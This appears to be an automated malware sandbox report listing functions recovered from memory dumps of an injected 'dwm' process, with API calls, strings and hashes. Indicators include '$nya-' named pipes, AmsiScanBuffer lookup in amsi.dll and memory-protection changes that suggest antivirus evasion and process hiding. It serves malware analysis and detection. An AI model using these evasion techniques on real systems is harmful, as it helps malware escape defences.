API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 79eebeeea8eb118916d0eda9454e38644123b0cb9c9798ef4695d7c32eca9c9c
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: F6317C36A00E60E6E721DF12A80C759A3B0BB98F95FC54525DE4947E28DF39C55AC740

Function 00000262F1DC962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000262F1DC9689

Part of subcall function 00000262F1DCA544: __GetUnwindTryBlock.LIBCMT ref: 00000262F1DCA587
Part of subcall function 00000262F1DCA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000262F1DCA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000262F1DC9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000262F1DC99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000262F1DC9ABC

Strings

csm, xrefs: 00000262F1DC9784
csm, xrefs: 00000262F1DC970A
csm, xrefs: 00000262F1DC96A3

Memory Dump Source

Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 843c0ab050e5dc9186cd6ab82f13d119bd0f797b27d970d1ebf14714769f23ed
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: DED19E72600BA0CAEB64DF69D49C39E77B0F755788F901A05EE8957F9ADB36C098C700

Function 00000262F1DFA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000262F1DFA289

Part of subcall function 00000262F1DFB144: __GetUnwindTryBlock.LIBCMT ref: 00000262F1DFB187
Part of subcall function 00000262F1DFB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000262F1DFB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000262F1DFA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000262F1DFA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000262F1DFA6BC

Strings

csm, xrefs: 00000262F1DFA2A3
csm, xrefs: 00000262F1DFA384
csm, xrefs: 00000262F1DFA30A

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: c4113c2c39446a7ee9839a48dd83c3e4969bee18a5cf484c77f8ebefaf03d7f6
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 37D18C32A04FA0CAEB28DB65E44C39D77B4F785788F900115EE8957F9ADB36D689C700

Function 00000262F1DF2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000262F1DF252D
GetCurrentProcessId.KERNEL32 ref: 00000262F1DF2537
CreateFileW.KERNEL32 ref: 00000262F1DF2568
WriteFile.KERNEL32 ref: 00000262F1DF2590
ReadFile.KERNEL32 ref: 00000262F1DF25AF
CloseHandle.KERNEL32 ref: 00000262F1DF25B8

Strings

\\.\pipe\$nya-childproc, xrefs: 00000262F1DF2549

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 5de7ef49f1eddf215600ff2dcb176773ba43a11c04e93ddfdfb036716f5949ad
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: B611F332618A60C2E710CB21F85C35A6770FB89BA4F944215EA9A06EA8DF7DC149CF40

Function 00000262F1DC7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000262F1DC7078
__scrt_acquire_startup_lock.LIBCMT ref: 00000262F1DC70CA
_RTC_Initialize.LIBCMT ref: 00000262F1DC70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000262F1DC711E
__scrt_release_startup_lock.LIBCMT ref: 00000262F1DC7149

Memory Dump Source

Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: f966d0fbfd5181f3d4ab3cb4e0010a4d60398171696f2f1d33717b0f0e3c08e3
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 08810431700E71C6FB54AB66984E39D32F1AB96780FC84925AE4947F96DB3BC84EC740

Function 00000262F1DF9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00000262F1DF9C6B,?,?,?,00000262F1DF945C,?,?,?,?,00000262F1DF8F65), ref: 00000262F1DF9B31
GetLastError.KERNEL32(?,?,?,00000262F1DF9C6B,?,?,?,00000262F1DF945C,?,?,?,?,00000262F1DF8F65), ref: 00000262F1DF9B3F
LoadLibraryExW.KERNEL32(?,?,?,00000262F1DF9C6B,?,?,?,00000262F1DF945C,?,?,?,?,00000262F1DF8F65), ref: 00000262F1DF9B69
FreeLibrary.KERNEL32(?,?,?,00000262F1DF9C6B,?,?,?,00000262F1DF945C,?,?,?,?,00000262F1DF8F65), ref: 00000262F1DF9BD7
GetProcAddress.KERNEL32(?,?,?,00000262F1DF9C6B,?,?,?,00000262F1DF945C,?,?,?,?,00000262F1DF8F65), ref: 00000262F1DF9BE3

Strings

api-ms-, xrefs: 00000262F1DF9B51

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: bd35e50b7c9577164dd31b6bb9e7c7d82c69ea216ab55e633be8508c41b8759c
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 9131E431612E24C1EF199B12A85C79523B4BB48BA8FD90525ED1D4BF98DF3AC54C8700

Function 00000262F1E03400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000262F1E03431
GetLastError.KERNEL32 ref: 00000262F1E0343D
CloseHandle.KERNEL32 ref: 00000262F1E03455
CreateFileW.KERNEL32 ref: 00000262F1E03480
WriteConsoleW.KERNEL32 ref: 00000262F1E0349F

Strings

CONOUT$, xrefs: 00000262F1E03461

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: c30f57fb76d3b04364d0244af361f0622d0cddff240ed87598fb5d101dcc3bed
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 77116A36310F60C6E7508B52E85C719A6B4F798FE4F844224EE5E87FA4CF3AC8088B40

Function 00000262F1DF6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000262F1DF62AB
GetThreadContext.KERNEL32 ref: 00000262F1DF6415

Part of subcall function 00000262F1DF60A0: GetCurrentThreadId.KERNEL32 ref: 00000262F1DF60A4

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: c37e83d5ede720489fd49d43090114b465004edaabc66ee7fc5d525d5058292e
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 7DD17A76208F98C1EB709B1AE49835A77B4F788B88F500116EA8D57FA5DF3AC655CB00

Function 00000262F1DF35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000262F1DF24D1), ref: 00000262F1DF35EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000262F1DF24D1), ref: 00000262F1DF35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000262F1DF24D1), ref: 00000262F1DF3673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000262F1DF24D1), ref: 00000262F1DF36D9
HeapFree.KERNEL32(?,?,?,?,?,00000262F1DF24D1), ref: 00000262F1DF36E7

Strings

$nya-, xrefs: 00000262F1DF366C

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 0dddf79800a339e139615db1c909eb676572f5de6caa2341f7f55d863918b242
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 0A315A32701F65E6EA15DF26A94C769A3B0FB54B84F898020DF484BF55EF3AC5A9C700

Function 00000262F1DFC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000262F1DFC94F
SetLastError.KERNEL32 ref: 00000262F1DFC96E
FlsSetValue.KERNEL32 ref: 00000262F1DFC997
FlsSetValue.KERNEL32 ref: 00000262F1DFC9A8
FlsSetValue.KERNEL32 ref: 00000262F1DFC9B9

Part of subcall function 00000262F1DFD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000262F1DF674A), ref: 00000262F1DFD2B6
Part of subcall function 00000262F1DFD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000262F1DF674A), ref: 00000262F1DFD2C0

SetLastError.KERNEL32 ref: 00000262F1DFC9DC

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: ab872278efbad2bebf8b55e636892575e3cdf689cb00bd476fc6d32e4127cc8b
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 6911C235300E71C2FA18A731789D76E1272AB84BE0FD84624EC665AFCACE3AC61D4340

Function 00000262F1DF1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000262F1DF1A56
K32GetModuleFileNameExW.KERNEL32 ref: 00000262F1DF1A74
PathFindFileNameW.SHLWAPI ref: 00000262F1DF1A83
lstrlenW.KERNEL32 ref: 00000262F1DF1A8F
StrCpyW.SHLWAPI ref: 00000262F1DF1AA2
CloseHandle.KERNEL32 ref: 00000262F1DF1AB0

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: d74e8ddb99d84f924abcd1d0f07239b668599017f54b52ac6a2bf701e9729563
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 4B01B331714A51C6EA14DB12A85C75A63B5EB88FD0F888035DE9947B54DE3AC98A8B80

Function 00000262F1DF3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000262F1DF3AAC), ref: 00000262F1DF3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1DF3AAC), ref: 00000262F1DF3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000262F1DF3AAC), ref: 00000262F1DF3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1DF3AAC), ref: 00000262F1DF3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000262F1DF3AAC), ref: 00000262F1DF3E9F
TerminateThread.KERNEL32(?,?,?,?,?,00000262F1DF3AAC), ref: 00000262F1DF3EAE

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 2134daa2c36f85a437160493f126f850756f86f4d5285c97e08eb5a2c03a7fe1
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 2101C575611F60C2FB289B21E85C71A62B4AF49B85F944528DE4D0AFA4EF3EC55CCB40

Function 00000262F1DF1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000262F1DF1AF4
StrCmpNIW.SHLWAPI ref: 00000262F1DF1B0E
lstrlenW.KERNEL32 ref: 00000262F1DF1B1D
StrCpyW.SHLWAPI ref: 00000262F1DF1B32

Strings

\\?\, xrefs: 00000262F1DF1B02

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: dfdf98c78afa2085932e44662d161787091307bff80651dc4d6001d58ea75a6b
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: ABF03C72304A95D2EB208B61E58C3596371FB44F88FC44021DA4946D58DF6EC68CCB00

Function 00000262F1DF3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,00000262F1DF275A), ref: 00000262F1DF372A
StrCpyW.SHLWAPI ref: 00000262F1DF373A
StrCatW.SHLWAPI ref: 00000262F1DF3746
PathCombineW.SHLWAPI(?,?,00000000,00000262F1DF275A), ref: 00000262F1DF3754

Strings

\\.\pipe\, xrefs: 00000262F1DF3720

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 30ea306bba745eb18685f87dc028eacdafdff039199d8f5e14b494dfc86740a3
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 3DF05874304FA0C2EA488B12B91C12AA370AF48FC0F889030EE0A0BF18CE2DC54A8B00

Function 00000262F1DFB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000262F1DFB929
GetProcAddress.KERNEL32 ref: 00000262F1DFB93F
FreeLibrary.KERNEL32 ref: 00000262F1DFB95B

Strings

CorExitProcess, xrefs: 00000262F1DFB938
mscoree.dll, xrefs: 00000262F1DFB920

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 84e92ab79a2a964b9cbebb102321c178b06ca96cf635f8ef1d024fadf620c84f
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 34F03071211E11C5EA149B24A89D3696370EF89B60FD40619DE6A46DE4DF3EC54CC700

Function 00000262F1DF1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00000262F1DF1E47
GetProcAddress.KERNEL32 ref: 00000262F1DF1E57
Sleep.KERNEL32 ref: 00000262F1DF1E67

Strings

amsi.dll, xrefs: 00000262F1DF1E40
AmsiScanBuffer, xrefs: 00000262F1DF1E50

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 8b57134514d28b269daad84a15167f3bb4d74873c7df395a77a5c8ef63b6ec98
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: A0D09E30661E20D5FA0CAF11EC9C3682271BF64F01FC44459C90E02EA0DF7E855DC740

Function 00000262F1DF5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000262F1DF5896

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
